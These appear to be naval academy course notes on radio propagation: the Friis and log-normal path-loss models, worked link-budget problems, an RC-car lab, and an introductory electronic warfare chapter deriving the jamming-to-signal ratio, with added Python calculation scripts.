To figure out how to compute received power, let’s consider how an isotropic antenna radiates in a spherical shape. As EM waves move away from the isotropic antenna, the sphere gets larger and larger, until it touches our receive antenna. The transmitter transmits a constant power; however, the power density is going to decrease as the distance from the transmit antenna increases. Power density is the amount of power received per unit area (W/m²).
The power density that reaches the receive antenna is going to be based on the surface area of a sphere, where the distance between the transmitter and receiver (d) is the radius of the sphere. Since the surface area of a sphere of radius d is given by

$$ A_{sphere} = 4\pi d^2 $$

the power density ($P_d$) at the receiver in units of W/m² is:

$$ P_d = \frac{P_{\text{isotropic antenna}}}{4\pi d^2} = \frac{EIRP}{4\pi d^2} = \frac{P_t G_t}{4\pi d^2}. $$

Now, the last thing we need to do is to turn that power density into the actual received power. Power density is power per unit area, so what is the “area” we are interested in? Since we are receiving the signal on an antenna, the “area” of interest is the area of the receive antenna. The derivation of the effective area of an antenna is beyond the scope of the course, but it is mathematically defined as:

$$ A_e = \frac{G_r \lambda^2}{4\pi}. $$

Finally, we can put all this together and determine the equation for received power, which is received power density (W/m²) multiplied by effective area (m²):

$$ P_r = P_d \times A_e = \frac{P_t G_t}{4\pi d^2} \times \frac{G_r \lambda^2}{4\pi} = \frac{P_t G_t G_r \lambda^2}{(4\pi d)^2} $$

where the variables are defined as:

Pr      Received power (W or mW)
Pt      Transmitted power (W or mW)
Gt      Transmit antenna gain (unitless)
Gr      Receive antenna gain (unitless)
λ       Transmission wavelength (m)
d       Distance between transmitter and receiver (m)

This is known as the Friis Free Space Equation. It is fundamental to understanding how received power is reduced as a function of distance for wireless communications.

Important note: in this equation, there are NO decibel terms! The two most common mistakes made when using this equation are using dB values instead of linear values, and failing to get the wavelength/distance units correct. If you’re given a problem that includes dB values for any of the terms, take the values out of decibels!

Let’s go back to our cell phone example.

Practice Problem 25.2
Your cell phone transmits at a power level of 500 mW, with an antenna gain of 2.0 dB.
The cell tower has an antenna gain of 8.0 dB, and is a distance of 5 miles away. For LTE, you’re transmitting at 700 MHz. Will your signal make it to the tower and will it have sufficient power to “close the link” and allow you to communicate? Or will you suffer the fate of a cellular “dead zone”? (Note: 1 mile = 1.609 km, and consider −105 dBm as the minimum power required to be able to “close the link”.)

Note: The Friis Free Space equation is technically only valid for free-space environments (although many situations will mimic free space). So the question is: what happens when we add back in the mountains, the buildings, the earth, and the atmosphere?

IV. Log-Normal Model

Most terrestrial wireless communications operate in the VHF and UHF bands. Those bands are mostly used for narrowband, long-distance communication. In this frequency range, the earth and atmosphere play a far smaller role, and propagation becomes dominated by the specific local environment.

Let’s consider the following scenario. Suppose we convince the ECE Department to build a cell tower on the top of Rickover Hall, and you’re driving down McNair Road. The signal you receive will be a combination of reflection, diffraction, and scattering, as shown in the image below. The problem is that we call it “mobile” radio for a reason: you want to be able to drive, move about the local environment, and communicate on your cell phone at the same time.

[Figure: reflection, diffraction, and scattering of the tower’s signal in the local environment]

As you move about the environment, the three propagation modes will have an impact on the instantaneous received signal in different ways. Under these conditions, you receive a nice strong signal reflected from Mahan Hall, with a little bit of signal energy coming from diffraction off the back corner of Nimitz Library, along with some energy scattered by the clock tower.
As you move towards Alumni Hall, the direct line-of-sight signal to the tower will be blocked, as will most of the strong reflected signals; diffraction is now the dominant mode. Conversely, if you moved towards Rickover Hall, you would receive a nice strong line-of-sight signal from the tower, along with a strong reflection from the Northeast side of Nimitz Library as well as scattering from all the parked cars in the Triangle Lot (between Rickover Hall and Nimitz Library).

So the question remains: Using your brand-new iPhone (or Samsung phone as the case may be), will your signal make it to the tower and will it have sufficient power to “close the link” and allow you to communicate? Or will you suffer the fate of a cellular “dead zone”? What happens when you put all three major modes of propagation together? How do you create a simple, easy-to-utilize model to compute the resulting received signal power? Clearly, the Friis Free Space equation is out, since it is based on unobstructed, direct line-of-sight transmission. In addition, ground wave/sky wave effects are so small that they can be neglected.

Although numerous sophisticated models exist (and are used to varying degrees in both commercial and military systems), by far the simplest and most common way to describe propagation in such an environment is the Log-Normal model (also called the Log-Distance model). This model is widely used not only to predict coverage for a particular mobile user, but also to predict the interfering signal power that the mobile user will experience from other RF sources.

A description of the log-normal model begins with the definition of path loss. Path loss is the amount by which the transmitted signal has dropped by the time it gets to a receiver at distance d away.
Usually computed in decibels, path loss as a function of distance d is defined as:

$$ PL_{dB}(d) = P_t(\mathrm{dB}) - P_r(\mathrm{dB}, d) $$

Over the years, wireless engineers have observed that average path loss for a particular environment is related to the distance d and follows a $d^n$ relationship, where the variable n is known as the Path Loss Exponent, and n is specific to that environment. Researchers have also observed that when they made numerous measurements at a specific distance (but in different local environments), the variation in received signal power obeyed a “bell curve” distribution about the local mean (the “bell curve” is formally known as a “Normal” or “Gaussian” distribution). Plotted on a log scale, the results look something like this:

[Figure: path loss PL (dB) versus distance on a log scale (1 m, 10 m, 100 m, 1 km, 10 km): the average path loss is a straight line (the distance-dependent mean), with a Gaussian distribution of path loss about that mean at each particular distance]

We call this Log-Normal Path Loss. Average Path Loss obeys a linear relationship (straight line) on a log scale, and the variation in received power at that distance follows a normal distribution. The slope of the line is the Path Loss Exponent, and is determined experimentally for the particular scenario of interest. Mathematically, the Log-Normal Path Loss at a distance d is given by:

$$ PL_{dB}(d) = PL_{dB}(d_0) + 10 \cdot n \cdot \log_{10}\left(\frac{d}{d_0}\right) $$

In this equation, the variables are:

d            Distance from transmitter to receiver in meters
d0           A reference distance, usually 1 meter
n            Path loss exponent (unitless)
PLdB(d)      Path loss at distance d (in dB)
PLdB(d0)     Path loss at reference distance d0 (in dB)

The value of PLdB(d0) is usually calculated with the Friis Free-Space equation or measured empirically. Note that antenna gains, wavelength, etc. are embedded in the model parameters (in PLdB(d0) and n). Changing the configuration means we will end up with different model parameters and different results.
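As an added example (Python written for these notes, not code from the EC310 course), the script below chains the Friis Free Space equation and the Log-Normal model into one link-budget calculation: it converts the dB gains and the mile distances to linear units before applying Friis (the two mistakes the notes warn about), derives PLdB(d0) from the free-space received power at d0 = 1 m, extends it with the path loss exponent, checks the result against a receiver threshold, and inverts the model to find the largest distance at which the link still closes; it also includes the radio-horizon formula from the space-wave section. The demo scenario (a 450 MHz, 1 W handheld with 3 dB and 6 dB gains, n = 3.0, a −100 dBm threshold) is a constructed assumption, not a problem from the notes.

```python
import math

C_M_PER_S = 3.0e8         # speed of light, as used in the notes
METERS_PER_MILE = 1609.0  # 1 mile = 1.609 km, as used in the notes


def db_to_linear(value_db):
    """Power ratio in dB -> unitless linear ratio (e.g. 8.0 dB -> 6.31)."""
    return 10.0 ** (value_db / 10.0)


def mw_to_dbm(power_mw):
    """Power in mW -> dBm (10 log10 of the power referenced to 1 mW)."""
    return 10.0 * math.log10(power_mw)


def wavelength_m(freq_hz):
    """Wavelength lambda = c / f, in meters."""
    return C_M_PER_S / freq_hz


def friis_received_power_mw(pt_mw, gt_db, gr_db, freq_hz, d_m):
    """Friis Free Space equation, Pr = Pt*Gt*Gr*lambda^2 / (4*pi*d)^2.

    Every term is converted to linear units (mW, unitless gain, meters) before
    the formula is applied, so dB values never enter it by accident.
    """
    gt = db_to_linear(gt_db)
    gr = db_to_linear(gr_db)
    lam = wavelength_m(freq_hz)
    return pt_mw * gt * gr * lam ** 2 / (4.0 * math.pi * d_m) ** 2


def reference_path_loss_db(pt_mw, gt_db, gr_db, freq_hz, d0_m=1.0):
    """PL_dB(d0) = Pt(dBm) - Pr(dBm, d0), with Pr at d0 taken from Friis."""
    pr_d0_mw = friis_received_power_mw(pt_mw, gt_db, gr_db, freq_hz, d0_m)
    return mw_to_dbm(pt_mw) - mw_to_dbm(pr_d0_mw)


def log_normal_path_loss_db(pl_d0_db, n, d_m, d0_m=1.0):
    """PL_dB(d) = PL_dB(d0) + 10 * n * log10(d / d0)."""
    return pl_d0_db + 10.0 * n * math.log10(d_m / d0_m)


def log_normal_max_distance_m(pl_d0_db, n, pl_max_db, d0_m=1.0):
    """Invert the Log-Normal model: the distance at which path loss reaches pl_max_db."""
    return d0_m * 10.0 ** ((pl_max_db - pl_d0_db) / (10.0 * n))


def link_budget(pt_mw, gt_db, gr_db, freq_hz, d_m, n, sensitivity_dbm, d0_m=1.0):
    """Received power at d_m by both models, and whether the Log-Normal result closes the link."""
    pt_dbm = mw_to_dbm(pt_mw)
    pr_free_dbm = mw_to_dbm(friis_received_power_mw(pt_mw, gt_db, gr_db, freq_hz, d_m))
    pl_d0 = reference_path_loss_db(pt_mw, gt_db, gr_db, freq_hz, d0_m)
    pl_d = log_normal_path_loss_db(pl_d0, n, d_m, d0_m)
    pr_ln_dbm = pt_dbm - pl_d
    # Largest distance at which the path loss still leaves Pr >= sensitivity.
    max_d = log_normal_max_distance_m(pl_d0, n, pt_dbm - sensitivity_dbm, d0_m)
    return {
        "pr_free_space_dbm": pr_free_dbm,
        "pl_d0_db": pl_d0,
        "pl_d_db": pl_d,
        "pr_log_normal_dbm": pr_ln_dbm,
        "closes": pr_ln_dbm >= sensitivity_dbm,
        "max_distance_m": max_d,
    }


def radio_horizon_miles(height_ft):
    """d = sqrt(2h): antenna height in feet -> distance to the radio horizon in miles."""
    return math.sqrt(2.0 * height_ft)


def los_range_miles(h1_ft, h2_ft):
    """Maximum line-of-sight separation of two antennas, sqrt(2 h1) + sqrt(2 h2), in miles."""
    return radio_horizon_miles(h1_ft) + radio_horizon_miles(h2_ft)


if __name__ == "__main__":
    # Constructed scenario (an assumption, not from the notes): 1 W handheld at 450 MHz,
    # 3 dB / 6 dB antenna gains, 2 miles from the receiver, urban n = 3.0,
    # receiver threshold -100 dBm.
    result = link_budget(pt_mw=1000.0, gt_db=3.0, gr_db=6.0, freq_hz=450e6,
                         d_m=2.0 * METERS_PER_MILE, n=3.0, sensitivity_dbm=-100.0)
    for key, value in result.items():
        print(f"{key:>20}: {value:.2f}" if isinstance(value, float) else f"{key:>20}: {value}")
    print(f"LOS range for 100 ft and 10 ft antennas: {los_range_miles(100.0, 10.0):.1f} miles")
```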
Values for path loss exponents have been tabulated for a number of environments, and a few representative values are given in the following table.

Path Loss Exponents for Different Environments

Environment                        Path Loss Exponent, n
Urban Area                         2.7 to 3.5
Dense Urban Area                   3 to 5
In Building with Line-of-Sight     1.6 to 1.8
In Building Obstructed             4 to 6
Factory Floor Obstructed           2 to 3
Retail Stores                      1.8 to 2.5

So after all that discussion, we still haven’t answered the question: Using your brand-new iPhone (or Samsung phone as the case may be), will your signal make it to the tower and will it have sufficient power to “close the link” and allow you to communicate? Or will you suffer the fate of a cellular “dead zone”?

Practice Problem 25.3
Your cell phone transmits at a frequency of 700 MHz and a power level of 500 mW, and has an antenna gain of 2.0 dB. The ECE Department’s cell tower has an antenna gain of 8.0 dB. Let’s assume you’re at the entrance to Gate 8, which would put you approximately 1.0 km away from the tower. From the table above, the USNA campus most closely matches “Urban Area”, so let’s use a Path Loss Exponent that’s exactly in the middle of the range 2.7-3.5, so use n = 3.1.

We will need to calculate the path loss at a reference distance (PLdB(d0)). The choice of reference distance is technically arbitrary, but is typically 1 meter, as it makes the math much easier to work with.
First, convert antenna gains out of decibels and compute the wavelength:

$$ G_t = 10^{2/10} = 1.585, \qquad G_r = 10^{8/10} = 6.310, \qquad \lambda = \frac{c}{f} = \frac{3 \times 10^8 \ \mathrm{m/sec}}{700 \times 10^6 \ \mathrm{Hz}} = 0.428 \ \mathrm{m} $$

Now use the Friis Free Space equation to calculate the received power at 1 m:

$$ P_r(\text{at 1 m}) = \frac{P_t G_t G_r \lambda^2}{(4\pi d)^2} = \frac{500 \ \mathrm{mW} \times 1.585 \times 6.310 \times (0.428 \ \mathrm{m})^2}{(4\pi \times 1 \ \mathrm{m})^2} = 5.8 \ \mathrm{mW}, $$

or in dBm,

$$ 10 \log_{10}\left(\frac{5.8 \ \mathrm{mW}}{1 \ \mathrm{mW}}\right) = 7.6 \ \mathrm{dBm} $$

Compute the path loss at the reference distance:

$$ PL_{dB}(d_0 = 1 \ \mathrm{m}) = P_t(\mathrm{dBm}) - P_r(\mathrm{dBm}, 1 \ \mathrm{m}) = 27 \ \mathrm{dBm} - 7.6 \ \mathrm{dBm} = 19.4 \ \mathrm{dB} $$

Compute the path loss at distance d = 1000 m:

$$ PL_{dB}(d) = PL_{dB}(d_0) + 10 \cdot n \cdot \log_{10}\left(\frac{d}{d_0}\right) = 19.4 \ \mathrm{dB} + 10 \times 3.1 \times \log_{10}\left(\frac{1000 \ \mathrm{m}}{1 \ \mathrm{m}}\right) = 112.4 \ \mathrm{dB} $$

Finally, determine the received power at the cell tower:

$$ PL_{dB}(d = 1000 \ \mathrm{m}) = P_t(\mathrm{dBm}) - P_r(\mathrm{dBm}, 1000 \ \mathrm{m}) $$

so

$$ P_r(\mathrm{dBm}, 1000 \ \mathrm{m}) = P_t(\mathrm{dBm}) - PL_{dB}(d = 1000 \ \mathrm{m}) = 27 \ \mathrm{dBm} - 112.4 \ \mathrm{dB} = -85.4 \ \mathrm{dBm} $$

Note that this is actually weaker (by 15 dB, or a factor of 30) than the received power at a distance of 5 miles (8 km) that was predicted by the Friis Free Space equation for a similar scenario in the previous Practice Problem. This illustrates the inaccuracy of using the Friis equation in scenarios that are not free-space. Incidentally, a received signal power of −85.4 dBm is still sufficient to “close the link” and communicate with the tower (recall that −105 dBm is the minimum power to “close the link”).

Problems

1. Is diffraction harmful or advantageous in radio communications? Explain.
2. What are the three modes by which an electromagnetic wave can travel from a source to a destination?
3. What is the term used for an electromagnetic wave that propagates by line-of-sight?
4. A ship-to-ship marine-band VHF radio operates at 156 MHz and is limited to a maximum of 25 watts. The signal propagates via space propagation, so it is limited in range to direct line-of-sight. A Coast Guard transmitting station on shore has a monopole antenna that is 350 feet tall.
(a) If a ship is 35 miles (56,315 m) away from the CG station, how high must the ship’s monopole antenna be mounted to ensure reception?
(b) Using the Friis Free-Space equation, calculate the received power at the ship.
(c) If someone is standing in a life raft with a hand-held VHF radio (assume an antenna height of 6’), what is the maximum range from which they could contact the ship in part (a)?
5. In a certain communication link, the transmit power is 5 W and the path loss is 100 dB. What is the received power in mW?
6. Use the log-normal model to solve for the distance of transmission (d) given the following parameters. Use the Friis Free-Space equation to determine the path loss at d0 = 1 m. n = 2.7, f = 900 MHz, Pt = 10 dBm, Pr = −70 dBm, Gt = 1.64, Gr = 5 dB.

Security Exercise 25

Drivers, start your engines. Today we looked at various ways radio waves propagate through space and air. For this lab, we will be using radio control (RC) cars as our communication system to evaluate the propagation of electromagnetic waves as they traverse through space. Now, we have gone out of the way to purchase the best radio control cars in the world. That’s right! Only the best for you guys. We acquired Ferraris, Audi R8s, Lamborghinis, Camaros, etc. Don’t they look so pretty?

The cars that you have available to you today operate at a couple of different frequencies.

Question 1: Examine the cars and write down the frequencies at which the cars operate on your answer sheet.

Question 2: Based on the frequencies you just determined for the cars in your classroom and what you learned in class, which propagation mode is used to control these cars? (i.e. ground wave, sky wave, space wave)

Question 3: Why won’t the other two propagation modes work?

Question 4: What are the wavelengths of the frequencies associated with the RC cars? Show your work and record your wavelengths on the answer sheet.
Now that you know the wavelengths associated with the frequencies, how far do you expect the cars to travel? You need some information to calculate the distance. The gain for the transmitting antenna is -8 dB. The gain for the receiver antenna is also -8 dB. The power of the transmitter (PT) is 10 dBm. The minimum power necessary at the receiver (PR) to control the car is -50 dBm. Rearrange and use the Friis Free Space equation to determine the distances for both the high- and low-frequency car.

Question 5: Show your work and record your expected distances on the answer sheet.

Alright. You have your calculation. Now, it’s time to take measurements and see how accurate they are. Measure how far the lower frequency car will go. Make sure your measurement is in meters. Drive from the front of the classroom to the back and around the back benches, not out of the classroom. Remember, the distance should be a straight line to the car, not the path it takes. So how far did it travel?

Question 6: Record the experimental distance for the lower frequency car on the answer sheet.

You should’ve noticed that the car didn’t go nearly as far as you calculated. Why? Think back to the equation you used to calculate the distance. What did we say about the equation? It needs to be used in free space without obstructions. That means no terrain, mountains, buildings, ground, or atmosphere. In the classroom, there are desks, lab equipment, people—all obstacles. So the Friis Free Space equation isn’t going to provide an accurate distance. When we have all this furniture and equipment that can interfere with the signal, they will reflect the signal, diffract the signal, and/or scatter the signal. Remember that:

(1) Reflection occurs when energy (or the signal) reflects off a large (relative to the λ) conductive surface.
(2) Diffraction occurs when energy bends around objects.
(3) Scattering occurs when EM waves strike a rough surface (smaller than λ) and re-radiate the EM wave in many different directions.

As the signal is affected by all the lab equipment, people, etc., the signal at the receiver is a combination of many variations of the original signal. This variation leads to a reduced signal strength. So how are you going to determine how far the higher frequency car should go?

Let’s use the Log-Normal model. This model is widely used not only to predict coverage for a particular mobile user (i.e. the RC car), but also to predict the interfering signal power that the mobile user will experience from other Radio Frequency sources (i.e. the cell phones in your pocket). The log-normal equation is:

$$ PL_{dB}(d) = PL_{dB}(d_0) + 10 \cdot n \cdot \log_{10}\left(\frac{d}{d_0}\right). $$

To predict the distance of the high frequency car, you need a few pieces of information. Inside a building with obstructions (i.e. your classroom), you would expect a path loss exponent of 4-6. For your classroom, use 4 as the path loss exponent (n = 4). At the max distance, you would expect a Pr of −50 dBm, and your Pt is 10 dBm (use the difference in Pt and Pr to determine PLdB(d)). The last piece of information you need to make your calculation work is: at d0 = 1 meter, the path loss is 10 dB (that is, PLdB(d0) = 10 dB). Use the path-loss equation above to compute the distance d, given these parameters.

Question 7: Show your work and record the new expected distance (d) for your higher frequency car on the answer sheet.

Question 8: Now go drive the higher frequency car. Drive from the front of the classroom to the back and around the back benches, not out of the classroom. How far did it go in meters? Remember, the distance should be a straight line to the car, not the path it takes.

You did it. So now you can calculate, at least for an RC car, the distance a radio wave will travel. But be aware that if you change the configuration (i.e.
you go into the hall), you will have different model parameters and therefore different results.

One last test of your mathematical skills. Calculate the distance the lower frequency car will travel if you were outside. In this case, use a path loss exponent (n) of 2.6. All other parameters are the same.

Question 9: What is the expected distance (d) for your lower frequency car? Record it on the answer sheet.

Watch the YouTube video, RC Car Outside Distance.

Question 10: Were you correct (roughly)? ____________________________

Your final test. Using either car, place the car against the wall inside the classroom next to the door. Go outside the door where you can no longer see the car. Just on the other side of the wall should be fine. Try to move the car using the radio controller.

Question 11: Did it move? Why or why not? (Hint: Think back to the 3 interferences on page 3.)

EC310 Security Exercise 25

Name: __________________________________________________________________________________________

Question 1: Low frequency = _____________ High frequency = _____________
__________________________________________________________________________________________

Question 2:
__________________________________________________________________________________________

Question 3:
__________________________________________________________________________________________

Question 4: Wavelength (low frequency car) = _____________ Wavelength (high frequency car) = _____________
__________________________________________________________________________________________

Question 5: Distance (low frequency car) = _____________ Distance (high frequency car) = _____________
__________________________________________________________________________________________

Question 6: Experimental distance for low frequency car = _______________________________________________________________________________________

Question 7:
__________________________________________________________________________________________

Question 8:
__________________________________________________________________________________________

Question 9:
__________________________________________________________________________________________

Question 10:
__________________________________________________________________________________________

Question 11:
__________________________________________________________________________________________

Chapter 26: Electronic Warfare

Objectives:
(f) Define Electronic Warfare and provide an example of each of the three Electronic Warfare categories: Electronic Defense, Electronic Warfare Support and Electronic Attack.
(g) Define Jamming to Signal ratio (J/S) and calculate the necessary power to jam an emitter.

Connection to Cyber Security

Warfare involves offensive and defensive operations. In the Host Module, we learned that an adversary can attack our host computer by employing a buffer overflow exploit. To counter this attack, we have several defensive actions at our disposal; for example, we can avoid the C library functions that are notorious for inviting buffer overflows, we can use a non-executable stack, a canary can be used to detect an attempt to overwrite a stored return address, etc. Recall also that, aside from formal attack operations and defensive responses, an adversary might attempt to look for flaws in our host software. For example, an adversary might enter a ridiculously long value when prompted to enter something, as a test to see if he can make the program behave erratically.

In the Network Module, we learned that an adversary can attack our network using either a false route injection attack or a wide-area BGP route-hijacking attack. To defend against false route injection, we can use an OSPF authentication mechanism, or we might selectively set up passive interfaces on router ports.
To defend against a wide-area BGP route-hijacking attack, we can use judicious filtering at Autonomous System borders, or we might attempt to authenticate routing information against an Internet Routing Registry, or we can attempt to receive some cryptographic assurance of the routing information we receive by using the Resource Public Key Infrastructure. Recall also that, aside from formal attack operations and defensive responses, an adversary might attempt to perform "network reconnaissance" by using Wireshark, nmap or various network utilities.

Not surprisingly, we find in the Wireless Module that the electromagnetic spectrum can also be used for offensive and defensive operations, as well as for "reconnaissance" operations. In the context of wireless systems, these attack, defensive and reconnaissance operations are termed electronic warfare. The jamming and taking over of communication links are two of the ways that cyber attackers exploit wireless communications.

Electronic Warfare (EW)

The term Electronic Warfare (EW) refers to any action involving the use of electromagnetic energy to attack an adversary or to otherwise control the electromagnetic spectrum. EW includes three major subdivisions: electronic attack, electronic defense, and electronic warfare support. We'll discuss each of these in turn, starting with electronic warfare support.

A. Electronic Warfare Support

Electronic warfare support refers to those actions that are taken to search for, intercept, identify, and locate sources of radiated electromagnetic energy for the purpose of target identification, or for the planning and conduct of future operations. Phrased another way, electronic warfare support entails gathering knowledge about the enemy through the use of the electromagnetic spectrum.

We discussed an example of electronic warfare support in Security Exercise 23. Recall that in that lab you wandered the hallways of the Rickover lab deck in search of a wireless access point.
This was, at heart, an electronic warfare support operation—you were attempting to locate a radio emitter of interest. In the lab, your only goal upon locating the emitter was to note the funny message placed next to it. In a more realistic scenario, the data gathered from an emitter could produce intelligence concerning the user (friend or foe?) and their location.

Suppose you can pick up an adversary’s radio transmission. How could you determine the direction it is coming from? If you used a directional antenna like a Yagi, you could determine a compass bearing in the direction of the emitter. If you get a compass bearing from three locations, you could plot the bearings on a map and get a fix. This was actually one of the early means for ships to fix their position by electronic means, via the Omega or Loran C navigation systems, which were operational until shut down in favor of GPS.

B. Electronic Defense

Electronic defense includes those actions taken to protect personnel, facilities, and equipment from an adversary's use of the electromagnetic spectrum to attack us. It should be noted that in DoD literature (if one may use the word literature to describe stultifying, committee-drafted, jargon-laden gobbledygook), the term "electronic defense" is often termed "electronic protection", since in defending ourselves, we are protecting ourselves. (A few years ago, the in-vogue term for electronic defense was electronic counter-countermeasures (ECCM). Before that, the preferred term was electronic protective measures.)

We discussed an example of electronic defense in Security Exercise 23. Sure enough, you were simply wandering the hallways in search of a wireless access point. But in an analogous fashion, an adversary can home in on the transmissions of a ship, a submarine, an aircraft, or forces in the field.
To prevent an adversary from using the electromagnetic spectrum to locate our transmitter, we will often limit radio communications to the minimum necessary. Thus, emissions control is a form of electronic defense. Another form of electronic defense is the use of stealth technologies (shapes with low radar cross-sections, non-metallic materials, radar-absorbent coatings) to protect aircraft and ships from radar detection.

The definition of electronic defense is broadened to include not only the actions we take to defend ourselves, but also the actions that we take to protect our own ability to attack the enemy. This can lead to some confusion. For example, if we launch an infrared homing missile against an enemy, we are engaging in electronic attack. If our enemy sees the incoming missile and launches flares in an attempt to divert it, he is engaged in electronic defense and electronic attack. But if we counter his flares by using flare-rejection technology on our infrared homing missile, we are also engaged in electronic defense, since the flare-rejection technology protects our ability to attack! Think of the great exam questions!

C. Electronic Attack

Electronic attack involves the use of electromagnetic energy to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying an enemy's combat capability. The preeminent example of electronic attack is jamming.

Jamming

Jamming is the transmission of an electromagnetic signal that disrupts an adversary's communications. Consider the picture below. An enemy transmitter is sending information to an enemy receiver at a certain frequency, say f. The enemy transmitter and receiver are separated by a distance dS. Meanwhile, our hero is a distance dJ away from the enemy receiver. Our hero's goal is to transmit another signal—a jamming signal—at the same frequency—f—that the bad guys are using. The jamming signal will target the bad guy's receiver.
So, the intent is to have two signals arrive at the bad guy's receiver: the signal sent by the bad transmitter, and the midshipman's jamming signal. The midshipman's goal is to have his jamming signal be of sufficient power to override the signal from the bad transmitter, thus preventing the bad guys from communicating.

It is important to note that what we are jamming is the receiver, not the transmitter. As an analogy, imagine trying to yell something to someone across Worden Field. If a third person comes along and wants to prevent you from communicating, what would be more effective: to yell in the ear of the person trying to relay a message or to yell in the ear of the person trying to hear the message? The latter would be more effective.

I know what you are saying: Where's the math? For the jammer, the object is that the received jamming power at the Bad Guy receiver be greater than the received signal power from the Bad Guy transmitter. Using the Friis equation, the received jamming power ($P_J$) in terms of the jammer’s EIRP is (rearranging the equation a little):

$$ P_J = \frac{EIRP_J \cdot G_r \cdot \lambda^2}{(4\pi d_J)^2} = \frac{EIRP_J\, G_r\, \lambda^2}{(4\pi)^2 \cdot d_J^2} = \left(\frac{EIRP_J}{d_J^2}\right)\left(\frac{G_r \lambda^2}{16\pi^2}\right). $$

Similarly, the received signal power from the Bad Guy transmitter is:

$$ P_S = \left(\frac{EIRP_S}{d_S^2}\right)\left(\frac{G_r \lambda^2}{16\pi^2}\right). $$

If we divide the received jamming power by the received signal power, we create the jamming-to-signal ratio (J/S), a term similar to a signal-to-noise ratio:

$$ \frac{J}{S} = \frac{P_J}{P_S} = \frac{\left(\dfrac{EIRP_J}{d_J^2}\right)\left(\dfrac{G_r \lambda^2}{16\pi^2}\right)}{\left(\dfrac{EIRP_S}{d_S^2}\right)\left(\dfrac{G_r \lambda^2}{16\pi^2}\right)} = \frac{\left(\dfrac{EIRP_J}{d_J^2}\right)}{\left(\dfrac{EIRP_S}{d_S^2}\right)} = \left(\frac{EIRP_J}{EIRP_S}\right)\left(\frac{d_S^2}{d_J^2}\right). $$

Note that the wavelengths cancel since, in order for our jamming to be effective, our jamming signal must be the same frequency as the transmitted signal.
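As an added example (Python written for these notes, not code from the EC310 course), the script below evaluates the J/S ratio from the receiver's point of view, to check how much margin a link has against an interferer: it computes the ratio in decibels and cross-checks it against the linear (EIRP_J/EIRP_S)(d_S²/d_J²) form just derived, shows that dBW and dBm inputs give the same ratio because the 30 dB offsets cancel, and reports the signal EIRP needed to keep a required margin at the receiver. The scenario numbers (20 dBW interferer at 4000 m, 15 dBW signal at 9000 m) are constructed assumptions, not values from the practice problems.

```python
import math

DBW_TO_DBM = 30.0  # 0 dBW = 1 W = 1000 mW = 30 dBm


def db_to_linear(value_db):
    """Decibel value -> linear ratio (or watts, when the input is dBW)."""
    return 10.0 ** (value_db / 10.0)


def linear_to_db(ratio):
    """Linear ratio -> decibels."""
    return 10.0 * math.log10(ratio)


def js_db(eirp_j_db, eirp_s_db, d_s, d_j):
    """(J/S)_dB = EIRP_J - EIRP_S + 20 log10(d_S) - 20 log10(d_J).

    Both EIRPs must be in the same decibel unit (both dBW or both dBm) and
    both distances in the same length unit, as the text notes; the function
    cannot detect a mismatch, so check the inputs before calling it.
    """
    return eirp_j_db - eirp_s_db + 20.0 * math.log10(d_s) - 20.0 * math.log10(d_j)


def js_linear(eirp_j_w, eirp_s_w, d_s, d_j):
    """Linear form: (EIRP_J / EIRP_S) * (d_S^2 / d_J^2), wavelength already cancelled."""
    return (eirp_j_w / eirp_s_w) * (d_s ** 2 / d_j ** 2)


def jamming_effective(js_value_db):
    """True when the received jamming power exceeds the received signal (J/S > 1, i.e. > 0 dB)."""
    return js_value_db > 0.0


def signal_margin_db(eirp_j_db, eirp_s_db, d_s, d_j):
    """S/J in dB: how far the wanted signal sits above the interference at the receiver."""
    return -js_db(eirp_j_db, eirp_s_db, d_s, d_j)


def min_signal_eirp_db(eirp_j_db, d_s, d_j, required_margin_db):
    """Smallest signal EIRP (same dB unit as eirp_j_db) that keeps S/J >= required_margin_db.

    Obtained by setting (J/S)_dB = -required_margin_db in js_db and solving for EIRP_S.
    """
    return eirp_j_db + 20.0 * math.log10(d_s) - 20.0 * math.log10(d_j) + required_margin_db


if __name__ == "__main__":
    # Constructed scenario (an assumption, not from the notes): an interferer with
    # EIRP 20 dBW at 4000 m from our omnidirectional receiver, our own transmitter
    # with EIRP 15 dBW at 9000 m.
    ratio_db = js_db(20.0, 15.0, d_s=9000.0, d_j=4000.0)
    print(f"J/S = {ratio_db:.2f} dB; link overpowered: {jamming_effective(ratio_db)}")
    # The dBm form gives the same ratio, since the two 30 dB offsets cancel.
    print(f"J/S (dBm inputs) = {js_db(20.0 + DBW_TO_DBM, 15.0 + DBW_TO_DBM, 9000.0, 4000.0):.2f} dB")
    # Cross-check with the linear form, EIRPs converted from dBW to watts.
    lin = js_linear(db_to_linear(20.0), db_to_linear(15.0), 9000.0, 4000.0)
    print(f"J/S (linear form) = {linear_to_db(lin):.2f} dB")
    print(f"Signal EIRP needed for a 6 dB margin: {min_signal_eirp_db(20.0, 9000.0, 4000.0, 6.0):.1f} dBW")
```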
This equation is usually used in terms of decibels, so for power in watts,

$$ \left(\frac{J}{S}\right)_{dB} = EIRP_J(\mathrm{dBW}) - EIRP_S(\mathrm{dBW}) + 20\log_{10}(d_S) - 20\log_{10}(d_J), $$

and for power in milliwatts,

$$ \left(\frac{J}{S}\right)_{dB} = EIRP_J(\mathrm{dBm}) - EIRP_S(\mathrm{dBm}) + 20\log_{10}(d_S) - 20\log_{10}(d_J). $$

A J/S ratio greater than one (or a positive dB value) will mean the received jamming signal is stronger than the received Bad Guy transmitter signal. Note that in these J/S equations, the distances to the jammer and to the signal must be in the same units (e.g., meters).

Finally, an important assumption this equation makes is that the receiver has an omnidirectional beam pattern. This means the receiver will accept transmissions equally from all directions. If this were not so, then the equation above would need to take the receiver’s beam pattern into account.

Practice Problem 26.1
You are located 5500 meters from the omnidirectional receiver you are jamming. The transmitted signal that you are jamming originates 9500 meters from the receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter and jammer have line of sight, what EIRPdBW must you transmit to jam the receiver with a J/S of 5 dB? How many watts is this?

Solution:

Practice Problem 26.2
You can transmit an EIRP of 25 Watts with your jammer. The transmitted signal you are jamming originates 8500 meters from the omnidirectional target receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter and jammer have line of sight, how close must your jammer be to the target receiver to achieve a (J/S)dB of 3 dB?

Solution:

Practice Problem 26.3
Is there a possibility that our jamming scheme would not work if the Bad Guy Receiver was not omnidirectional? Explain.
Solution:

Security Exercise 26
Basics of Electronic Warfare

